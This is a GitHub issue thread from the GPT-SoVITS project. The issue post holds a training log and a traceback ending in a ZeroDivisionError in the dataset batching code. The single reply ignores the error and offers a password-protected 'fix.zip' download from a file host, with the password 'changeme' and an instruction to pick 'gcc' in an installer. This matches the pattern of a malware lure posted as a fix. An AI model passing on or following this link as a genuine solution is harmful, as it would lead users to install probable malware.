### ISSUE TITLE
GPT训练时leng 变量的值为零，导致出错

### ISSUE THREAD

**Issue by qwewqew** [RVC-Boss/GPT-SoVITS#1551]
"E:\GPT-SoVITS-v2-240821\GPT-SoVITS-v2-240821\runtime\python.exe" GPT_SoVITS/s1_train.py --config_file "E:\GPT-SoVITS-v2-240821\GPT-SoVITS-v2-240821\TEMP/tmp_s1.yaml"
Seed set to 1234
Using 16bit Automatic Mixed Precision (AMP)
GPU available: True (cuda), used: True
TPU available: False, using: 0 TPU cores
IPU available: False, using: 0 IPUs
HPU available: False, using: 0 HPUs
<All keys matched successfully>
ckpt_path: None
[rank: 0] Seed set to 1234
Initializing distributed: GLOBAL_RANK: 0, MEMBER: 1/1
[W C:\actions-runner\_work\pytorch\pytorch\builder\windows\pytorch\torch\csrc\distributed\c10d\socket.cpp:601] [c10d] The client socket has failed to connect to [wordpress.local]:2611 (system error: 10049 - 在其上下文中，该请求的地址无效。).
[W C:\actions-runner\_work\pytorch\pytorch\builder\windows\pytorch\torch\csrc\distributed\c10d\socket.cpp:601] [c10d] The client socket has failed to connect to [wordpress.local]:2611 (system error: 10049 - 在其上下文中，该请求的地址无效。).
----------------------------------------------------------------------------------------------------
distributed_backend=gloo
All distributed processes registered. Starting with 1 processes
----------------------------------------------------------------------------------------------------

semantic_data_len: 2
phoneme_data_len: 2
                                           item_name                                     semantic_audio
0  vocal_男性.mp3.reformatted.wav_10.wav_0000000000...  1012 937 262 556 690 676 13 205 635 893 245 96...
1  vocal_男性.mp3.reformatted.wav_10.wav_0000134080...  54 234 913 809 208 505 162 29 937 32 1023 192 ...
Traceback (most recent call last):
  File "E:\GPT-SoVITS-v2-240821\GPT-SoVITS-v2-240821\GPT_SoVITS\s1_train.py", line 183, in <module>
    main(args)
  File "E:\GPT-SoVITS-v2-240821\GPT-SoVITS-v2-240821\GPT_SoVITS\s1_train.py", line 159, in main
    trainer.fit(model, data_module, ckpt_path=ckpt_path)
  File "E:\GPT-SoVITS-v2-240821\GPT-SoVITS-v2-240821\runtime\lib\site-packages\pytorch_lightning\trainer\trainer.py", line 544, in fit
    call._call_and_handle_interrupt(
  File "E:\GPT-SoVITS-v2-240821\GPT-SoVITS-v2-240821\runtime\lib\site-packages\pytorch_lightning\trainer\call.py", line 43, in _call_and_handle_interrupt
    return trainer.strategy.launcher.launch(trainer_fn, *args, trainer=trainer, **kwargs)
  File "E:\GPT-SoVITS-v2-240821\GPT-SoVITS-v2-240821\runtime\lib\site-packages\pytorch_lightning\strategies\launchers\subprocess_script.py", line 102, in launch
    return function(*args, **kwargs)
  File "E:\GPT-SoVITS-v2-240821\GPT-SoVITS-v2-240821\runtime\lib\site-packages\pytorch_lightning\trainer\trainer.py", line 580, in _fit_impl
    self._run(model, ckpt_path=ckpt_path)
  File "E:\GPT-SoVITS-v2-240821\GPT-SoVITS-v2-240821\runtime\lib\site-packages\pytorch_lightning\trainer\trainer.py", line 950, in _run
    call._call_setup_hook(self)  # allow user to setup lightning_module in accelerator environment
  File "E:\GPT-SoVITS-v2-240821\GPT-SoVITS-v2-240821\runtime\lib\site-packages\pytorch_lightning\trainer\call.py", line 92, in _call_setup_hook
    _call_lightning_datamodule_hook(trainer, "setup", stage=fn)
  File "E:\GPT-SoVITS-v2-240821\GPT-SoVITS-v2-240821\runtime\lib\site-packages\pytorch_lightning\trainer\call.py", line 179, in _call_lightning_datamodule_hook
    return fn(*args, **kwargs)
  File "E:\GPT-SoVITS-v2-240821\GPT-SoVITS-v2-240821\GPT_SoVITS\AR\data\data_module.py", line 30, in setup
    self._train_dataset = Text2SemanticDataset(
  File "E:\GPT-SoVITS-v2-240821\GPT-SoVITS-v2-240821\GPT_SoVITS\AR\data\dataset.py", line 110, in __init__
    self.init_batch()
  File "E:\GPT-SoVITS-v2-240821\GPT-SoVITS-v2-240821\GPT_SoVITS\AR\data\dataset.py", line 190, in init_batch
    for _ in range(max(2, int(min_num / leng))):
ZeroDivisionError: division by zero

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
